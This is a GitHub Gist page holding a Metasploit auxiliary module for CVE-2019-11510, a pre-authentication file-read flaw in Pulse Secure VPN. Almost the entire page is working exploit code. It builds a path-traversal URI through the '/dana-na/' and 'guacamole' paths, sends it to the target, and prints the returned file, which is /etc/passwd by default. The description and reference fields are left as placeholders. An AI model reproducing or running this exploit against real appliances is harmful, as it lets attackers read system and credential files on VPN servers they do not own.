Created
September 11, 2019 15:10
-
-
Save stormfleet/b7682e520c70989057656a1d7112b843 to your computer and use it in GitHub Desktop.
MSF Implementation of Orange Tsai's CVE-2019-11510
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## | |
| # This module requires Metasploit: https://metasploit.com/download | |
| # Current source: https://github.com/rapid7/metasploit-framework | |
| ## | |
| class MetasploitModule < Msf::Auxiliary | |
| include Msf::Exploit::Remote::HttpClient | |
| def initialize(info = {}) | |
| super(update_info(info, | |
| 'Name' => 'Pulse Secure VPN Pre-Auth File Read', | |
| 'Description' => %q{ | |
| Something | |
| }, | |
| 'Author' => [ '' ], | |
| 'License' => MSF_LICENSE, | |
| 'References' => | |
| [ | |
| ['OSVDB', ''], | |
| ['BID', ''], | |
| ['CVE', '2019-11510'], | |
| ['US-CERT-VU', ''], | |
| ['URL', ''], | |
| ], | |
| 'DisclosureDate' => '08 May 2019', | |
| 'Actions' => | |
| [ | |
| ['Download'] | |
| ], | |
| 'DefaultAction' => 'Download' | |
| )) | |
| register_options( | |
| [ | |
| Opt::RPORT(443), | |
| OptString.new('RPATH', | |
| [ | |
| true, | |
| "The file to download", | |
| "/etc/passwd" | |
| ] | |
| ), | |
| ]) | |
| end | |
| def run | |
| print_status("Retrieving contents of #{datastore['RPATH']}...") | |
| uri = "/dana-na/../dana/html5acc/guacamole/../../../../../.." + Rex::Text.uri_encode(datastore['RPATH']) + "?/dana/html5acc/guacamole/" | |
| res = send_request_raw({ | |
| 'uri' => uri, | |
| }, 10) | |
| if (res) | |
| print_status("The server returned: #{res.code} #{res.message}") | |
| print(res.body) | |
| else | |
| print_status("No response from the server") | |
| end | |
| end | |
| end |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment